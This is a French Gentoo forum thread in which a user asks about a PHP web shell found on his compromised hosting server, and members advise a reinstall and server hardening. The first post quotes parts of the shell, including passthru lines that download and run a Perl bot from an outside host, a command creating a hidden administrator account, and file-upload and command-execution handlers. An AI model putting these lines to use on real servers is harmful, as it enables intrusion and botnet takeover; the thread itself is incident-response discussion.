# [SECURITE] Serveur web sous Gentoo mal sécurisé

## MIMATA

Bonjour à tous, 

J'utilise un serveur kimsufi avec une distribution Gentoo installée dessus. Je me sert de ce serveur pour héberger des sites internet et j'ai quelques problèmes.

Le premier est qu'il m'arrive de bloquer la machine à cause d'une surcharge CPU à 100% et swap et mémoire très élevé ce qui plante tout en général. Malgré mes recherches dans les logs, je n'ai toujours pas trouvé ce qui pouvait bien provoquer ça si ce n'est un script mal codé mais si c'est ça comment faire pour identifier le script fautif ?

Mon deuxième problème qui est peut-être une solution au premier d'ailleurs est le suivant : aujourd'hui, j'ai découvert dans des dossiers de l'un des sites hébergés des fichiers nommés bcd.php lesquels sont bloqués par mon antivirus en local (NOD32) qui les identifient sous le nom de PHP/Exploit.E trojan.

J'ai édité l'un de ces fichiers et il est clair que le code est malveillant. Voici quelques extraits de ce code mais au besoin je peux fournir l'ensemble du code (j'hésite à le mettre en entier ici à cause des problèmes évidents de sécurité que cela pourrait poser).

```
<title>CMD > 4LoNe'5 > File List</title>

...

<?

//passthru('cd /tmp;wget http://br.geocities.com/mund0paralel0/bot.txt;perl bot.txt;rm -f bot.txt*'); passthru('cd /tmp;curl -O http://br.geocities.com/mund0paralel0/bot.txt;perl bot.txt;rm -f bot.txt*'); passthru('cd /tmp;lwp-download http://br.geocities.com/mund0paralel0/bot.txt;perl bot.txt;rm -f bot.txt*'); passthru('cd /tmp;lynx -source http://br.geocities.com/mund0paralel0/bot.txt > bot.txt;perl bot.txt;rm -f bot.txt*'); passthru('cd /tmp;fetch http://br.geocities.com/mund0paralel0/bot.txt > bot.txt;perl bot.txt;rm -f bot.txt*'); passthru('cd /tmp;GET http://br.geocities.com/mund0paralel0/bot.txt > bot.txt;perl bot.txt;rm -f bot.txt*'); ?>

<?php

...

@set_time_limit(0);

 $string = $_SERVER['QUERY_STRING'];

 $mhost = 'http://alonesystem.by.ru/cmd/list';

 $host_all = explode("$mhost", $string);

 $s1 = $host_all[0];

 $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;

 $OS = @PHP_OS;

 $IpServer = '127.0.0.1';

 $UNAME = @php_uname();

 $PHPv = @phpversion();

 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }

 else { $SafeMode = "<i>$SafeMode</i>"; }

 $btname = 'backtool.txt';

 $bt = 'http://www.full-comandos.com/jobing/r0nin';

 $dc = 'http://www.full-comandos.com/jobing/dc.txt';

 $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup &quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';

 // Java Script

 echo "<script type=\"text/javascript\">";

 echo "function ChMod(chdir, file) {";

 echo "var o = prompt('Chmod: - Exemple: 0777', '');";

 echo "if (o) {";

 echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + \"\";";

 echo "}";

 echo "}";

 echo "function Rename(chdir, file, mode) {";

 echo "if (mode == 'edit') {";

 echo "var o = prompt('Rename file '+ file + ' for:', '');";

 echo "}";

 echo "else {";

...ça continue avec des appel à mkdir, chdir, etc.

if (@$_GET['chdir']) {

 $chdir = $_GET['chdir']; 

} else {

   $chdir = getcwd()."/";

  }

if (@chdir("$chdir")) {

 $msg = "<font color=\"#008000\">Entrance&nbsp;in&nbsp;the&nbsp;directory,&nbsp;OK!</font>";

} else {

 $msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;enters&nbsp;it&nbsp;in&nbsp;the&nbsp;directory!</font>";

 $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);

}

 $chdir = str_replace(chr(92), chr(47), $chdir);

if (@$_GET['action'] == 'upload') {

 $uploaddir = $chdir;

 $uploadfile = $uploaddir. $_FILES['userfile']['name'];

 if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {

...

elseif (@$_GET['action'] == 'mkdir') {

    $newdir = $_GET['newdir'];

    if (@mkdir("$chdir"."$newdir")) {

 ...

      }

}

elseif (@$_GET['action'] == 'newfile') {

    $newfile = $_GET['newfile'];

...

/* Parte Atualiza 02:48 12/2/2006 */

...

// Informa??es

 $cmdget = '';

 if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }

 if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }

 $cmdget = htmlspecialchars($cmdget);

 function asdads() {

  $asdads = '';

  if (@file_exists("/usr/bin/wget")) { $asdads .= "wget&nbsp;"; }

  if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch&nbsp;"; }

  if (@file_exists("/usr/bin/curl")) { $asdads .= "curl&nbsp;"; }

  if (@file_exists("/usr/bin/GET")) { $asdads .= "GET&nbsp;"; }

  if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx&nbsp;"; }

  return $asdads;

 }

...

des formulaires

...

 echo "<td width=\"10%\" $color>&nbsp;$size&nbsp;KB</td>";

            if ($mode == 'edit') {

             echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;<a href=\"#{$file}\" onclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";

            } else {

               echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;[Copy]</td>";

              }   

...
```

Je suis en train de scanner le serveur à l'aide de clamav mais je ne trouve aucune info sur ce que fait ce trojan. Quelqu'un saurait me dire où je pourrais trouver des infos sur ce trojan ?

----------

## geekounet

Salut et bienvenue !

Peux-tu mettre ton titre du topic en conformité avec les conventions de notre forum s'il te plait ? Merci  :Smile: 

Pour ton problème, maintenant que ton serveur est infecté, tu n'as plus qu'à le réinstaller à zéro (ou restaurer un ancien backup), principe de base de sécurité. D'autre part, les Gentoo préinstallées de chez OVH sont connues pour être mal foutues, galère à maintenir et pas du tout à jour, donc assez susceptible d'être vulnérable. Donc si tu avais effectivement choisi cette option, je te conseille plutôt à l'avenir d'y mettre une Gentoo installée à nue que tu conf toi même et tout.

----------

## kwenspc

+1 pour la réinstall (ceci dit une étude apporofondie du système peut souvent déceler qu'il n'a pas été réellement mis en péril, par exemple ce script php y a de forte chance qu'il soit éxecuté sans les droit root etc... donc pas de risques graves. Souvent il s'agit de script kiddie utilisé pour le spamming, donc ça ne cherche pas à prendre la main complète sur le serveur. Mais on est jamais sûr de rien après.)

Sinon quand un site hebergé permet une attaque alors il faut de suite fermer le site et contacter la personne responsable (le proprio du site) de gérer le problème. (et pas attendre que tout aille de mal en pis)

----------

## MIMATA

Ayé, j'ai changé le titre, en espérant que ça convienne parce que je suis un peu paumé à cause de ma méconnaissance de Gentoo. 

En fait, je me fais les dents sur gentoo et j'apprends sur le tas c'est pourquoi je cherche à comprendre le problème et à le résoudre. 

Ceci dit, la solution de tout réinstaller ne m'emballe pas du tout du tout  :Wink:  et je ne me sens pas non plus de tout installer par moi même car malgré tout, installer tout un serveur seul me parait bien plus risqué pour la sécurité que de m'en remettre à une version préconfigurée.  :Confused:   C'est quand même un peu étrange de constater que la seule solution consiste à formater...en général, c'est le reproche qu'on fait à Windows, je pensais que Linux était au dessus de ça, on m'aurait menti ?  :Very Happy: .

Le problème n'exige pas d'être aussi catégorique que ça me semble-t-il et j'ai espoir de comprendre et de corriger le problème sans avoir à tout réinstaller. D'autres idées peut-être ?

Merci à vous

----------

## anigel

Bonjour,

 *MIMATA wrote:*   

> Ayé, j'ai changé le titre, en espérant que ça convienne parce que je suis un paumé à cause de ma méconnaissance de Gentoo.

 

Pour le titre, ça fera l'affaire. Par contre je suis surpris de voir que tu héberge des sites internet sur un OS que tu ne "méconnais"  :Shocked: . Ca confirme ma première impression en lisant ton premier post : parler de virus au lieu de parler de faille de sécurité exploitée me laissait à penser que tu ne maîtrisais pas ton affaire. Pour moi, le problème de départ est là.

 *MIMATA wrote:*   

> En fait, je me fais les dents sur gentoo et j'apprends sur le tas c'est pourquoi je cherche à comprendre le problème et à le résoudre. 

 

Dans ce cas, monte une Gentoo dans une machine virtuelle, sur un vieux PC, bref, sur n'importe quoi qui ne soit pas dangereux !

 *MIMATA wrote:*   

> Ceci dit, la solution de tout réinstaller ne m'emballe pas du tout du tout  et je ne me sens pas non plus de tout installer par moi même car malgré tout, installer tout un serveur seul me parait bien plus risqué pour la sécurité que de m'en remettre à une version préconfigurée.  

 

La preuve...

 *MIMATA wrote:*   

> C'est quand même un peu étrange de constater que la seule solution consiste à formater...en général, c'est le reproche qu'on fait à Windows, je pensais que Linux était au dessus de ça, on m'aurait menti ? .

 

La première fois que je suis tombé de cheval, j'ai accusé le cheval de ne pas savoir me porter. Tu as installé des services en production, sur un serveur que tu paie, avec un accès internet direct et extrêmement performant, et à l'heure qu'il est tu inonde probablement la moitié de la planète de spams. effectivement, je ne vois pas de raison de s'affoler ?

----------

## raoulp

 *MIMATA wrote:*   

> C'est quand même un peu étrange de constater que la seule solution consiste à formater...en général, c'est le reproche qu'on fait à Windows, je pensais que Linux était au dessus de ça, on m'aurait menti ? .

 

Salut,

Tu es quand même dans un cas bien particulier. Il ne faut pas tout mélanger.

a+

----------

## MIMATA

OK ok, je ne suis pas un pro et c'est pourquoi je demande un peu d'aide sur un forum spécialisé. Maintenant, si tu ne veux pas m'aider c'est pas grave, je sais que bien souvent quand on demande de l'aide dans ce domaine, la réponse est dans le genre de la tienne, réflexe élitiste peut-être ? En gros, pour pouvoir poser une question, il faudrait déjà connaître la réponse...  :Very Happy:   C'est pas grave mais cheval ou pas, pour savoir monter (à cheval), il faut monter et c'est ce que je fais. On n'apprend pas en simulant sur une chaise, j'ai choisi d'y aller direct. En tout cas, j'ai pas parlé de virus mais de trojan et il semble bien que ça en soit un, j'ai peut-être pas tout faux...  :Confused: 

Que mon problème soit sur un serveur qui héberge des vrais sites (qui sont à moi je précise) ou en local, je ne vois pas ce que ça change et si je m'installe une distrib que pour moi, je risque pas d'avoir de problème et de rencontrer les difficultés dont je parle.

Pour finir, rien ne dit que le problème vienne de la configuration de gentoo. Cela peut tout aussi bien provenir d'un script mal codé et dans ce cas là je ne vois pas en quoi la réinstallation totale d'un système me mettrait à l'abri d'une récidive  :Wink: 

En tout cas, clamav m'a permis de trouver quelques fichiers infectés (tous des bcd.php comme je le disais) et ma question reste la même : où puis-je trouver des infos sur ce trojan pour comprendre ce qu'il fait ?

----------

## kwenspc

 *MIMATA wrote:*   

> 
> 
> Pour finir, rien ne dit que le problème vienne de la configuration de gentoo. Cela peut tout aussi bien provenir d'un script mal codé et dans ce cas là je ne vois pas en quoi la réinstallation totale d'un système me mettrait à l'abri d'une récidive 
> 
> 

 

Oui et non  :Smile: 

Oui: c'est sûr que ton site à une faille puisqu'il a permit l'insertion de ce trojan 

Non: parce qu'un serveur web bien configuré ne permet pas ce type d'écriture, encore moins d'exécution (un tel flot de données et une exécution bizarre comme celle là ça se detecte très facilement et ça se coince aussi très rapidement). 

Donc il va te falloir revoir les deux. Et ta config, et ton site.

 *MIMATA wrote:*   

> 
> 
> En tout cas, clamav m'a permis de trouver quelques fichiers infectés (tous des bcd.php comme je le disais) et ma question reste la même : où puis-je trouver des infos sur ce trojan pour comprendre ce qu'il fait ?

 

Le problème c'est que clamav a detecté que c'était un script-kiddie de type trojan codé en php, mais il ne te donne pas le nom. Et le problème là encore c'est qu'il y en a une floppé de ce genre des scripts  :Confused: 

Bon a priori (trouvé dans le code) a viendrait de là --> http://alonesystem.by.ru/ c'est cool il donne même le serveur irc et le chan où le joindre  :Laughing: 

à la limite tu peux essayer, ça arrive qu'ils soient pas trop bête (finalement) et qu'il t'explique pas à pas ce que fait son script et si oui ou non ça a pervertit le système de fond en comble (tentes le coup on sais jamais, ça pourra t'eviter la réinstall, l'étude du code par toi même etc...)

----------

## anigel

Personne ne te demande d'être un pro. Mais si tu viens ici poser une question, et que 3 personnes te donnent la même réponse, je pense, à priori, qu'il doit y avoir une bonne raison. Ce n'est pas que je ne veuille pas t'aider, mais simplement que je ne peux pas t'aider, à plus forte raison puisque, malgré les conseils de geekounet (modérateur ici), kwenspc (qui a pas mal d'interventions à son actif également), et la mienne (élitiste, ainsi soit-il - en certaines circonstances je l'assume), tu ne remets pas en question ta vision des choses.

Tu veux absolument conserver ton système en l'état ? De l'avis général c'est dangereux, que puis-je ajouter ???

Mais puisque ton message m'y invite, je vais en profiter pour étaler ma science, faire mon élitiste en somme  :Wink: . Un Cheval de Troie (un Trojan, en informatique, terme hérité de l'oeuvre d'Homère), c'est un truc qu'on introduit soi-même dans son PC sans se douter de ce qu'il va faire. Un exemple typique sous Windows : installer Messenger Plus, pour avoir tous les bitonios qui clignotent dans MSN, mais qui se trouve être farci de spywares. Ca c'est un vrai troyen : c'est toi qui l'installe, sans que quiconque s'introduise dans ton PC. Bref, un Trojan, c'est quand l'usager se tire lui-même la balle dans le pied. A ma connaissance, installer Apache et PHP n'a jamais installé de logiciels tiers, il ne s'agit donc pas d'un infection par Troyen, mais bel et bien d'une faille de sécurité. Elle peut être liée à ta conf PHP (je mise là-dessus, au pif), ou à un script mal codé, effectivement. Donc non, désolé, ce n'est pas un troyen.

 *MIMATA wrote:*   

> On n'apprend pas en simulant sur une chaise, j'ai choisi d'y aller direct.

 

Si je peux me permettre, c'est dangeureux et irresponsable. Dangereux parceque tu place tes données sur une plate-forme dont tu ne sais pas te servir, et irresponsable, car cette plate-forme est visiblement relativement facile à pénétrer. Maintenant, imaginons qu'à ton insu, quelqu'un lance une attaque depuis ton kimsufi contre des serveurs vaguement importants (ceux du ministère de l'intérieur, du CNRS, des impôts, de la CIA) : à moins que tu ne sois capable de prouver et de retrouver la personne qui a utilisé ton système, tu es coupable. Pour ton information, au CNRS, lorsqu'une intrusion est détectée, et que nous avons possibilité de porter plainte, nous le faisons systématiquement depuis quelques années. A toi de voir si le jeu en vaut la chandelle. Là où je trouve qu'il serait plus judicieux de t'exercer chez toi, c'est parceque depuis une ligne ADSL, les moyens sont tout de suite nettement plus restreint, et intéressent moins le type de pirate que je décrivais à l'instant.

Mon conseil, puisque tu me le demande, sera donc de te documenter sur Gentoo, et de tester cette distrib à l'abri chez toi, je le répète. Et si tu as absolument besoin de ton kimsufi pour l'hébergement, pourquoi ne pas opter plutot pour une offre d'hébergement mutualisé ? La sécurité est gérée en amont, et ça te laisse le temps de te documenter tranquillement. Ou, au pire, une Debian, distrib qui dispose d'une excellente pré-configuration.

Sur ce, je retourne me soigner, la fièvre et l'angine me rendent irritable, aujourd'hui...   :Twisted Evil: 

----------

## MIMATA

Ok, je comprends bien. Je ne veux froisser personne, je cherche juste à comprendre et à apprendre à trouver des solutions. Tout réinstaller sans comprendre ne m'avancera pas à grand chose dans mon difficile apprentissage. Je cherche, je trouve et j'y arriverai mais peut-être pas seul. Cette expérience me permettra j'espère de mieux apprendre à "me" protéger et d'éviter qu'à l'avenir je rencontre les mêmes problèmes. Le tout, c'est de savoir où regarder et c'est pour ça que j'ai ouvert un sujet.

Où pourrais-je trouver un bon tuto bien détaillé et bien expliqué pour apprendre à sécuriser correctement un serveur web sous gentoo alors ?

----------

## anigel

J'espère que tu ne vas pas tenter de continuer avec ce système bancal en tous cas... Mais, pour rebondir sur mon dernier message, une Debian bien configurée, et la lecture du manuel de sécurisation feraient déjà un très bon départ. Tu peux aussi consulter les avis de sécurité concernant PHP, c'est assez instructif en général.

----------

## xaviermiller

+1 pour 

- déinstaller

- bien se documenter

- configurer pour ne pas transformer son PC en joujou pour hackers et un jour se taper un procès pour des faits dont on ingorait l'existance et dont tu es légalement responsable

----------

## MIMATA

Bonsoir à tous, 

Devant tant d'insistance, j'ai fini par réinstaller un système tout neuf, par contre je ne sais toujours pas vraiment ce qu'il faut faire exactement pour m'éviter ce genre de problème à l'avenir.

Pour la nouvelle mouture, j'ai suivi ce tutorial, en tout cas en partie.

J'ai commencé par installer la release 2 d'OVH qui est déjà préconfigurée pour faire de l'hébergement web...par contre, de très nombreux modules du webmin installé avec la release ne sont pas fonctionnels et il faut modifier des chemins dans la configuration des modules pour qu'ils fonctionnent...c'est bizzare qu'OVH ne livre pas une release fonctionnelle...bref.

Pour revenir à nos moutons, j'ai fait ce qui est indiqué à partir de la page 2 : clamav, les détecteurs de rootkits (rkhunter et chkrootkit qui n'est pas mentionné ici), etc. sauf zend optimizer et webmin. En fait, je ne sais pas vraiment si spamassassin fonctionne bien.  :Confused: 

Maintenant, je ne sais pas vraiment si c'est suffisant, j'en doute. Je voudrais paramétrer le firewall de linux mais j'y pige rien, pareil pour iptable.

Auriez-vous connaissance de tutos pour débutant concernant ces sujets ?

Et comment faire pour ajouter un utilisateur qui ne soit pas root mais qui a suffisament de droits pour que je puisse me connecter en SSH ? (oui je sais, c'est la base...)  :Embarassed: 

----------

## gbetous

 *MIMATA wrote:*   

> 
> 
> Devant tant d'insistance, j'ai fini par réinstaller un système tout neuf

 

J'abonde dans le sens de tous ceux qui t'ont demandé de le faire. C'était en effet la première mesure URGENTE.

 *MIMATA wrote:*   

> par contre je ne sais toujours pas vraiment ce qu'il faut faire exactement pour m'éviter ce genre de problème à l'avenir.

 

Commencer par le mettre 100% à jour. C'est LE premier conseil à donner. D'ailleurs étant totalement mauvais en sécurité, c'est bien le seul que je puisse te donner   :Laughing: 

----------

## kwenspc

 *anigel wrote:*   

> J'espère que tu ne vas pas tenter de continuer avec ce système bancal en tous cas... Mais, pour rebondir sur mon dernier message, une Debian bien configurée, et la lecture du manuel de sécurisation feraient déjà un très bon départ. Tu peux aussi consulter les avis de sécurité concernant PHP, c'est assez instructif en général.

 

Ce manuel de sécurisation debian peut très facilement être adapté à Gentoo. Après tout il s'agit avant tout de bien configurer tes services (apache, mysql et consorts...).

Dans gentoolkit il y a un outil très pratique nommé glsa-check qui te permet de checker rapidement si dans les paquets installés il y a en a qui ont subit une alerte de sécurité et qu'il faut donc mettre à jour, reconfigurer etc... Tout est expliqué dans l'info de l'alerte que l'outil peut te ressortir. Sinon globalement il y a pas mal de méthodes basiques qui peuvent "sauver", genre éviter qu'un utilisateur X puisse lire les répertoires de l'utilisateur Y, ou avoir accès à des commandes telles que wget par exemple (très fréquemment utilisé pour downloader, apèrs coup, des backdoors ou autre). Donc restreint son accès au groupe portage par exemple.

Il y a beaucoup à faire pour sécuriser un serveur et en faire le tour ici prendrais du temps.

----------

## Temet

[HS]

Je vous ai trouvé bien dur avec lui... un peu plus et je me serais cru sur un forum Debian.

[/HS]

----------

## MIMATA

J'ai regardé du côté de glsa-check et notamment cette page seulement cette phrase n'est pas très rassurante : 

 *Quote:*   

> Attention : L'outil glsa-check est encore en test. Si la sécurité est un point critique de votre installation, veuillez vérifier la liste avec une autre source.

 

Donc, si je fais : 

```
# glsa-check -t all
```

J'ai une liste très longue. Etes vous sûr que je puisse tout mettre à jour sans risque de plantage  avec la commande suivante ?

```
# glsa-check -f $(glsa-check -t all)
```

----------

## babykart

 *Temet wrote:*   

> [HS]
> 
> Je vous ai trouvé bien dur avec lui... un peu plus et je me serais cru sur un forum Debian.
> 
> [/HS]

 

je plussoie...

pour ce qui est de mettre en place le firewall disons d'une manière relativement facile: http://www.gentoofr.org/?Configuration-simplifiee-iptables

----------

## shakya

L'installation d'ovh n'est pas en effet une panacée... Mieux vaut réinstaller un système complet via le manager v3 et selectionner la reinstall...

Il te suffit de personnaliser ensuite ton partitionnement et reprendre tous les fichiers de conf pourmettre une "vraie" gentoo. 

Pour le profil, je te conseillle la branche Hardened qui renforce le noyau avec Pax et Grsec. Tes services, je te conseille de les chrooter et de gerer aussi tes rules iptables aussi bien pour l'entrant que le sortant. Une solution qui peut etre aussi très interressante est l'utilisation des vserver afin que chaque domaine tourne sur un serveur virtuel (ca evite de compromettre tout le reste)

Pour apache si tu souhaites le sécuriser, je te conseille mod_security qui permet d'interdire certaines requetes url et palier aux faiblesses de certains scripts et mod-evasive pour contrer les attaques DoS, de chrooter, bref de le betonner. Dans tous les cas, lis bien les docs à ce propos et si ton serveur a été compromis, REINSTALLE LE COMPLETEMENT !

Ca te permettra de repartir sur des bases dont tu seras sur qu'elles sont saines. Et puis comme l'ont dit certains intervenants ici, si tu ne te sens pas à l'aise avec une install gentoo, ne l'administre pas derrière, et choisi vite une autre distribution car tu n'auras sinon que des problemes.

Si par contre tu es motivé et que tu as besoin d'un coup de main pour te guider sur la reinstall (attention j'ai dit juste un coup de main!) et bien tu me fais ta demande en pv et je te laisser mon adresse xmpp.

Bien à toi  :Wink: 

----------

## El_Goretto

 *babykart wrote:*   

>  *Temet wrote:*   [HS]
> 
> Je vous ai trouvé bien dur avec lui... un peu plus et je me serais cru sur un forum Debian.
> 
> [/HS] 
> ...

 

Ben oui et non.

Oui, ça peut sembler dur comme réponse pour un nouveau gentooiste, à mon avis, personne ne se serait permis çà.

Et non en fait, car c'est dû à l'importance du sujet: la sécu.

Et pire, "jouer avec la sécu de ses données", c'est quelque chose qui fait doublement se hérisser le poil de tout admin ou utilisateur avancé consciencieux. Il réagit avec d'autant plus de fermeté (et pas d'agressivité attention) que dans ce genre de situation, il est d'usage de déclencher le plan d'action d'urgence avant de chercher à comprendre au risque de perdre encore plus.

Allez, bon courage MIMATA, et n'ait pas peur des gros mot qui sont passés ou ne vont pas tarder (comme harden, pax, etc), au début ça fait peur mais c'est juste un effort initial d'assimilation à fournir, ce n'est pas complexe en fait (pour en être simple utilisateur, bien sûr, parce que sinon...  :Smile: )

----------

## anigel

Il ne s'agit pas d'être dur mais d'être ferme : nous ne sommes pas en face d'un quidam bricolant dans son garage, mais en face d'un propriétaire de serveur dédié, disposant d'un upload équivalent à 150 de vos connexions ADSL. Un DoS lancé depuis 150 connexions ADSL ça s'appele un DDoD et ça a déjà fait tomber des services informatiques entiers ! Les systèmes UNIX ne sont pas des jouets mais bel et bien des outils professionnels. Je lisais plus haut que c'était étrange qu'OVH ne livre pas une distrib plus aboutie. Faut-il rappeler qu'OVH est un datacenter, et non une société d'infogérance ? Lorsqu'on paie pour un kimsufi, on a un kimsufi, çàd une machine et un accès root, et démerde-toi. D'un point de vue sécurité, mettre un serveur dédié entre les mains d'un néophyte pour qu'il apprenne, le tout connecté en illimité à 100 Mb sur le vaste monde, c'est comme mettre une Ferrari dans les mains d'un jeune pour la conduite accompagnée, avec le plein de carburant, et en avant ! Pour le type d'usage que semble avoir MIMATA, il me semble qu'un hébergement web sans accès root serait plus approprié : toute la gestion du système est faite par l'hébergeur, sécurité comprise. Il ne reste plus alors qu'à se concentrer sur le contenu du site.

MIMATA a suivi les conseils donnés plus haut, et c'est heureux. Mais c'est encore largement insuffisant puisque le problème de fond n'est pas réglé : l'incompétence de l'admin (ne le prends pas mal MIMATA, pour toute chose il faut apprendre, ne pas être savoir ne signifie pas être idiot). De mon point de vue ce n'est qu'une question de jours avant que son serveur ne se retrouve hacké une nouvelle fois. Nous sommes à Toussaint, pendant les vacances, traditionnellement une période où les ados qui découvrent les sniffers en font bon usage (+150% de scans sur les périodes de vacances scolaires, selon mes mesures). Je dis et je redis ce que j'ai avancé plus haut : un kimsufi entre des mains inexpérimentées est dangereux, rien de moins, rien de plus. Faire ça à la maison derrière le firewall de sa Livebox est déjà nettement plus sage, et, pour un site perso, ça suffit souvent largement. Gentoo est probablement l'une des distribs les plus difficile à mettre en production, puisqu'elle n'amène quasiment aucune préconfiguration, à la différence de Debian, dont tous les paquets ou presque sont pré-configurés avec une excellente gestion de la sécurité.

Bref, je suis navré pour ceux qui pensent qu'il faut aider à tout prix MIMATA à persévérer dans cette voie : je crois au contraire que ce serait cautionner une grosse erreur ; erreur qui peut potentiellement lui coûter ses données personnelles, avec quelques poursuites légales pour le même prix. Après tout, chacun s'amuse comme il veut... Pour ma part je n'interviendrai plus sur ce sujet, je ne souhaite pas charger l'arme avec laquelle notre ami va se tirer dans le pied.

MIMATA, si tu veux apprendre Gentoo, reprends tout du début, sur ton PC ou dans une machine virtuelle, à l'abri chez toi et là tu pourra compter sur moi pour t'aider à monter un système fonctionnel, sécurisé, à le tenir à jour et à bien en maîtriser les rouages. Et dans quelques mois tu sera parfaitement à même de gérer ton kimsufi, avec la distrib que tu auras choisie.

Amicalement,

----------

## salamandrix

 *MIMATA wrote:*   

> 
> 
> Maintenant, je ne sais pas vraiment si c'est suffisant, j'en doute. Je voudrais paramétrer le firewall de linux mais j'y pige rien, pareil pour iptable.
> 
> Auriez-vous connaissance de tutos pour débutant concernant ces sujets ?
> ...

 

Pour iptables, il y a cet excellent tuto de Christian Caleca :

http://christian.caleca.free.fr/netfilter/

Je te conseille de prendre tout ton temps pour le lire (c'est assez long). Il explique comment le configurer, mais aussi pourquoi (le type d'attaque qu'il peut avoir lieu). Personnellement je ne suis pas expert en informatique, mais ce didacticiel m'a profondément éclairé. Une chose qui peut aussi être faite, c'est de regarder des scripts firewall via iptables et de les comprendre via le lien donné plus haut.

----------

## Enlight

Bon je vais être off, mais je voulais juste défendre la veuve et l'orphelin en rappelant que "pallier" est un transitif direct, et qu'en tant que tel il prend un COD et non un COI, traduction, on pallie quelque chose, on ne pallie pas à quelque chose...

sinon question bête mais les serveurs d'OVH kimsufi, c'est un jeu de mot???

----------

